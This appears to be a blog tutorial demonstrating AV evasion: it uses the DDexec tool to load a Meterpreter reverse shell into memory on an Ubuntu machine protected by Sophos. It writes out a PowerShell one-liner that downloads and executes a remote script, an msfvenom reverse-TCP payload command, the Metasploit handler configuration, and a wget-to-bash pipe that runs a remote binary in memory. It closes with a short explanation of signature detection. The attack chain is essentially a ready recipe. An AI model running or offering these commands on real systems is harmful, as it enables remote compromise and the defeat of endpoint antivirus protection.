Bypassing Sophos anti-virus with DDexec

Introduction

Have you ever had a CTF challenge where you discover an vulnerability such as a kernel exploit, but cannot write to disk? Or perhaps there was an anti-virus software running that blocked the execution of a malicious binary. DDexec can solve problems like these and more, it is able to load shellcode into memory and execute it without ever needing to write to anywhere on the disk.

On Windows executing scripts in memory has been relatively easy using PowerShell. I demonstrated this in a prior post (Stealing Wi-Fi passwords with Digi spark):

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://$YOUR_VM_IP/theft.ps1')

The script (theft.ps1) is never saved to disk and is instead executed in memory, making it more difficult to detect using typical anti-virus software.

The creators of DDexec designed this tool to attack distroless containers. These containers contain the bare minimum amount of tools and libraries required to run a specific application or accomplish a task. These containers often don’t allow users to write anything to disk anywhere. This means that even if you find a serious vulnerability within the container, it would be difficult to exploit as binaries typically need to be written to disk prior to being executed. DDexec aims to solve this problem by creating a shell script that can load binaries into memory where they can later be called and executed. In this example I will be showcasing how DDexec could be used to bypass an up-to-date anti virus software.

DDexec dependencies:

tail | dd | hexdump | any other program that allows us to seek through a fd
bash | zsh | ash (busybox)
head
tail
cut
grep
od
readlink
wc
tr
basename
base64

Setup:

Attacker machine:

• Kali Linux Hyper-V virtual machine
• Metasploit

Victim machine:

• Ubuntu Hyper-V virtual machine
• Sophos endpoint AV installed

Demonstration:

Creating the reverse shell with msfvenom

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.19.51.113 LPORT=443 -f elf -o bad.elf

Setting up the meterpreter handler:

use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 172.19.51.113
set LPORT 443
run

Testing to ensure Sophos AV blocks the reverse shell binary when written on disk:

Sophos AV correctly blocks malicious binary from executing

Now using DDexec to load bad.elf into memory and execute:

wget -O- http://172.19.51.113/bad.elf | base64 -w0 | bash ddexec.sh

A shell is returned and we get no errors from the Sophos AV software.

Why does this work?
Sophos Anti-Virus software works by using something called signature based detection. Signature based detection works by comparing known malware signatures to that of files written on disk. When an application is launched the AV will first scan the file and compare it with its malware database to see if it finds a match. If it does then the AV will block execution and alert the user that a malicious signature was found. In this case however the malicious binary is never written to disk and instead loaded into RAM and executed. The AV never gets the chance to scan and stop the file execution. I recommend checking out the creators GitHub and various presentations on DDexec to learn more about how this incredible tool works and how it can be used to bypass various restricted environments.

• DDexec GitHub
• DDexec YouTube presentation